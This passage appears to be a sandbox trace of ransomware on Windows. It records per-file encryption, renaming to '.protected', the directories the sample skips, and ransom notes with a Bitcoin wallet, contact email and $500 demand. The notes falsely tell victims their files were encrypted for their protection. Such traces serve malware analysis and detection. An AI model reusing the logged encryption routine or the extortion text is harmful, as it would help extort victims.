returned 1 [0090.150] lstrcmpiW (lpString1="Global.MPT", lpString2="System Volume Information") returned -1 [0090.150] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT") returned 89 [0090.150] StrStrIW (lpFirst="Global.MPT", lpSrch=".protected") returned 0x0 [0090.150] lstrcmpW (lpString1="Global.MPT", lpString2="RESTORE_FILES.txt") returned -1 [0090.150] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.150] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.150] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT") returned 89 [0090.150] StrStrW (lpFirst="Global.MPT", lpSrch=".txt") returned 0x0 [0090.150] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT") returned 89 [0090.151] StrStrW (lpFirst="Global.MPT", lpSrch=".rar") returned 0x0 [0090.151] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT") returned 89 [0090.151] StrStrW (lpFirst="Global.MPT", lpSrch=".zip") returned 0x0 [0090.151] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.157] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.158] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.158] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.158] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.168] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.168] CloseHandle (hObject=0x154) returned 1 [0090.168] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.protected") returned 99 [0090.168] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt.protected")) returned 1 [0090.169] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.169] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.169] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\RESTORE_FILES.txt") returned 96 [0090.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.170] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.170] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.170] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.170] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.170] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.170] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0090.170] CloseHandle (hObject=0x150) returned 1 [0090.171] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.171] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.171] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\RESTORE_FILES.txt") returned 91 [0090.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.171] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.171] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.172] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.172] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.172] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.172] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.172] CloseHandle (hObject=0x14c) returned 1 [0090.173] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.173] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.173] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\RESTORE_FILES.txt") returned 88 [0090.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.174] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.174] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.174] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.174] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.174] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.174] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.174] CloseHandle (hObject=0xd8) returned 1 [0090.175] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.175] lstrcmpiW (lpString1="Network", lpString2="Windows") returned -1 [0090.175] lstrcmpiW (lpString1="Network", lpString2="Program Files") returned -1 [0090.175] lstrcmpiW (lpString1="Network", lpString2="Program Files (x86)") returned -1 [0090.175] lstrcmpiW (lpString1="Network", lpString2="$Recycle.bin") returned 1 [0090.175] lstrcmpiW (lpString1="Network", lpString2="System Volume Information") returned -1 [0090.175] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network") returned 67 [0090.175] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0090.175] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0090.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*") returned 69 [0090.175] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.175] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.175] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.175] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.175] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.175] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\.") returned 69 [0090.175] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.175] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.175] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.175] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.175] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.175] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.175] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\..") returned 70 [0090.175] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.175] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.176] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.176] lstrcmpiW (lpString1="Connections", lpString2="Windows") returned -1 [0090.176] lstrcmpiW (lpString1="Connections", lpString2="Program Files") returned -1 [0090.176] lstrcmpiW (lpString1="Connections", lpString2="Program Files (x86)") returned -1 [0090.176] lstrcmpiW (lpString1="Connections", lpString2="$Recycle.bin") returned 1 [0090.176] lstrcmpiW (lpString1="Connections", lpString2="System Volume Information") returned -1 [0090.176] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 79 [0090.176] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0090.176] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0090.176] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned 81 [0090.176] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.176] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.176] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.176] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.176] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.176] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.176] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.") returned 81 [0090.177] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.177] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.177] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.177] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.177] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.177] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.177] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\..") returned 82 [0090.177] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.177] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.177] lstrcmpiW (lpString1="Pbk", lpString2="Windows") returned -1 [0090.177] lstrcmpiW (lpString1="Pbk", lpString2="Program Files") returned -1 [0090.177] lstrcmpiW (lpString1="Pbk", lpString2="Program Files (x86)") returned -1 [0090.177] lstrcmpiW (lpString1="Pbk", lpString2="$Recycle.bin") returned 1 [0090.177] lstrcmpiW (lpString1="Pbk", lpString2="System Volume Information") returned -1 [0090.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned 83 [0090.177] lstrcmpW (lpString1="Pbk", lpString2=".") returned 1 [0090.177] lstrcmpW (lpString1="Pbk", lpString2="..") returned 1 [0090.177] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned 85 [0090.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.178] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.178] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.178] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.178] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.178] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.178] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\.") returned 85 [0090.178] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.178] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.178] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.178] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.178] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.178] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.178] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.178] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\..") returned 86 [0090.178] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.178] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.178] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.178] lstrcmpiW (lpString1="_hiddenPbk", lpString2="Windows") returned -1 [0090.178] lstrcmpiW (lpString1="_hiddenPbk", lpString2="Program Files") returned -1 [0090.178] lstrcmpiW (lpString1="_hiddenPbk", lpString2="Program Files (x86)") returned -1 [0090.178] lstrcmpiW (lpString1="_hiddenPbk", lpString2="$Recycle.bin") returned 1 [0090.178] lstrcmpiW (lpString1="_hiddenPbk", lpString2="System Volume Information") returned -1 [0090.178] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned 94 [0090.178] lstrcmpW (lpString1="_hiddenPbk", lpString2=".") returned 1 [0090.178] lstrcmpW (lpString1="_hiddenPbk", lpString2="..") returned 1 [0090.178] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned 96 [0090.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.179] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.179] lstrcmpiW (lpString1=".", lpString2="Program 